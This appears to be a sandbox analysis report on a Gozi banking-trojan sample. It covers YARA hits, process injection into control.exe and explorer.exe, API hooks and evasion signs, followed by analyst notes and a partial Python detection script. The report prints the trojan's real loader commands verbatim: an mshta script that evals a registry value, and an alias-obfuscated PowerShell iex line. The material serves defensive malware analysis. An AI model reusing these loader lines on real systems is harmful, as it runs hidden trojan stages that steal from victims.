              Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: C:\Windows\System32\control.exe Code function: 12_2_004963E0
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049D6F0
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A8868
              Source: C:\Windows\System32\control.exe Code function: 12_2_0048887C
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049887C
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A9010
              Source: C:\Windows\System32\control.exe Code function: 12_2_0048A89C
              Source: C:\Windows\System32\control.exe Code function: 12_2_0048B14C
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049594C
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049996C
              Source: C:\Windows\System32\control.exe Code function: 12_2_00482178
              Source: C:\Windows\System32\control.exe Code function: 12_2_00495108
              Source: C:\Windows\System32\control.exe Code function: 12_2_004929EC
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049F26C
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049DA04
              Source: C:\Windows\System32\control.exe Code function: 12_2_00494A1C
              Source: C:\Windows\System32\control.exe Code function: 12_2_0048E2D4
              Source: C:\Windows\System32\control.exe Code function: 12_2_0048D2F4
              Source: C:\Windows\System32\control.exe Code function: 12_2_0048C340
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049FBE8
              Source: C:\Windows\System32\control.exe Code function: 12_2_004863F0
              Source: C:\Windows\System32\control.exe Code function: 12_2_004833F4
              Source: C:\Windows\System32\control.exe Code function: 12_2_00488BB0
              Source: C:\Windows\System32\control.exe Code function: 12_2_004983B4
              Source: C:\Windows\System32\control.exe Code function: 12_2_00490C28
              Source: C:\Windows\System32\control.exe Code function: 12_2_00497484
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A7498
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A6D20
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A45A0
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A1E44
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A466A
              Source: C:\Windows\System32\control.exe Code function: 12_2_00481E64
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A8604
              Source: C:\Windows\System32\control.exe Code function: 12_2_00499E18
              Source: C:\Windows\System32\control.exe Code function: 12_2_00492EC4
              Source: C:\Windows\System32\control.exe Code function: 12_2_0048B6DC
              Source: C:\Windows\System32\control.exe Code function: 12_2_004926E8
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049AEF8
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A4694
              Source: C:\Windows\System32\control.exe Code function: 12_2_004846B0
              Source: C:\Windows\System32\control.exe Code function: 12_2_00498F68
              Source: C:\Windows\System32\control.exe Code function: 12_2_004897E0
              Source: C:\Windows\System32\control.exe Code function: 12_2_00493FF8
              Source: C:\Windows\System32\control.exe Code function: 12_2_004A0A50 NtQueryInformationProcess
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049342C NtSetInformationProcess
              Source: C:\Windows\System32\control.exe Code function: 12_2_00494E14 NtQueryInformationProcess
              Source: C:\Windows\System32\control.exe Code function: 12_2_0049E6C4 NtQueryInformationToken, NtQueryInformationToken, NtClose
              Source: C:\Windows\System32\control.exe Code function: 12_2_004BD002 NtProtectVirtualMemory, NtProtectVirtualMemory
              Source: bf.exe, 00000000.00000003.676183930.0000000003FC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs bf.exe
              Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: bf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: bf.exe Virustotal: Detection: 76%
              Source: C:\Users\user\Desktop\bf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown Process created: C:\Users\user\Desktop\bf.exe C:\Users\user\Desktop\bf.exe
              Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
              Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"
              Source: C:\Users\user\Desktop\bf.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
              Source: C:\Users\user\Desktop\bf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sgyoy32.ak1.ps1
              Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@15/16@2/1
              Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{44FBAADD-D3CD-1679-7DB8-B7AA016CDB7E}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{203ACFCB-FFA6-5208-8954-A3A6CDC8873A}
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
              Source: C:\Users\user\Desktop\bf.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: ntdll.pdb source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll

              Hooking and other Techniques for Hiding and Protection

              Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
              Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
              Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
              Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA26CE521C
              Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA26CE5200
              Source: C:\Users\user\Desktop\bf.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, TID 4756 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9741
Source: C:\Users\user\Desktop\bf.exe | Process information queried: ProcessInformation
Source: explorer.exe, 0000000B.00000002.733204558.0000000008631000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: control.exe, 0000000C.00000002.723650816.00000262EC513000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000002.739217384.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.716253522.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: control.exe, 0000000C.00000002.723789714.00000262EC534000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&u
Source: mshta.exe, 00000004.00000002.635584727.00000212A473E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000002.733204558.0000000008631000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Note: the VMware and Hyper-V device names above were found in the memory of explorer.exe, control.exe and mshta.exe, the host processes running on the analysis VM. They describe the sandbox hardware itself; on their own they do not show that the sample looked them up. The evidence for sandbox evasion in this section is the sleep behaviour of the PowerShell stage (the huge, negative thread delay values), not these strings.

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\bf.exe | Section loaded: unknown, target: C:\Windows\System32\control.exe, protection: execute and read and write
Source: C:\Users\user\Desktop\bf.exe | Memory written: C:\Windows\System32\control.exe, base: 7FF7F7F712E0 (2 entries)
Source: C:\Users\user\Desktop\bf.exe | Thread register set: target process: 4784 (control.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe, EIP: 29561580
Source: C:\Windows\System32\control.exe | Thread created: unknown, EIP: 29561580
Source: unknown | Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>ffsw='wscript.shell';resizeto(0,2);eval(new activexobject(ffsw).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([system.text.encoding]::ascii.getstring((rxihymmmsf "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn)) (2 entries)
Source: C:\Users\user\Desktop\bf.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"
Note: the process-creation entries describe two chains. bf.exe starts control.exe -h, writes into it and redirects one of its threads (PID 4784 above). Separately, mshta.exe runs an inline HTA that reads the testlocal value from the per-infection key HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E and eval()s it; that script starts powershell.exe, which hides gp and iex behind random aliases, reads the UrlsReturn value of the same key, decodes it as ASCII and executes it. The PowerShell stage then compiles C# from .cmdline files in %TEMP% via csc.exe (the 4rgoqrxw.dll and n2sgiaoa.dll listed as dropped above) and creates a thread inside explorer.exe. The next stages therefore live in the registry, not on disk, which is why the only dropped PE files are compiler output.
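The mshta / PowerShell / csc.exe chain above is what an endpoint detection should key on, and the random alias names are the part that changes between infections. The following is an added example, not code from the Joe Sandbox report or from the sample: a small Python triage script that runs three rules over process-creation records (the three records are constructed from the command lines quoted above; the record layout, field names and rule names are this script's own), resolves the new-alias names back to gp and iex, and extracts the registry key and value name the loader reads its next stage from.

```python
"""Triage rules for the mshta -> powershell -> csc.exe chain listed above.

Added example, not code from the Joe Sandbox report or from the sample. The
record layout, field names and rule names are this script's own; the three
sample records are constructed from the command lines quoted in the report.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input: three records built from process-creation lines quoted above.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {
        "parent": "unknown",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": (
            r'c:\windows\system32\mshta.exe" "about:<hta:application><script>'
            r"ffsw='wscript.shell';resizeto(0,2);eval(new activexobject(ffsw)"
            r".regread('hkcu\\\software\\appdatalow\\software\\microsoft"
            r"\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));"
            r"if(!window.flag)close()</script>"
        ),
    },
    {
        "parent": r"C:\Windows\System32\mshta.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": (
            r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
            "new-alias -name rxihymmmsf -value gp; "
            "new-alias -name qvfmhhdt -value iex; "
            "qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "
            r'"HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E")'
            ".UrlsReturn))"
        ),
    },
    {
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
        "cmdline": (
            r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig '
            r'/fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline'
        ),
    },
]

# "new-alias -name <random> -value <cmdlet>": the trick that hides gp and iex.
ALIAS_RE = re.compile(r"new-alias\s+-name\s+(\w+)\s+-value\s+(\w+)", re.I)
# HKCU\Software\AppDataLow\Software\Microsoft\<GUID>\<value>, in the JScript
# RegRead spelling (runs of backslashes) or the PowerShell HKCU:...").<value> one.
REG_RE = re.compile(
    r"hkcu(?::|\\+)software\\+appdatalow\\+software\\+microsoft\\+"
    r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"
    r'(?:\\+|"\)\.)(\w+)',
    re.I,
)


def resolve_aliases(cmdline: str) -> Tuple[Dict[str, str], str]:
    """Return the alias map and the command line with the aliases substituted."""
    aliases = dict(ALIAS_RE.findall(cmdline))
    resolved = re.sub(r"new-alias\s+-name\s+\w+\s+-value\s+\w+;?\s*", "", cmdline, flags=re.I)
    for name, target in aliases.items():
        resolved = re.sub(r"\b" + re.escape(name) + r"\b", target, resolved)
    return aliases, resolved


def registry_source(cmdline: str) -> Optional[Tuple[str, str]]:
    """Return (key path, value name) that the command reads its payload from."""
    m = REG_RE.search(cmdline)
    if not m:
        return None
    return r"HKCU\Software\AppDataLow\Software\Microsoft\%s" % m.group(1).upper(), m.group(2)


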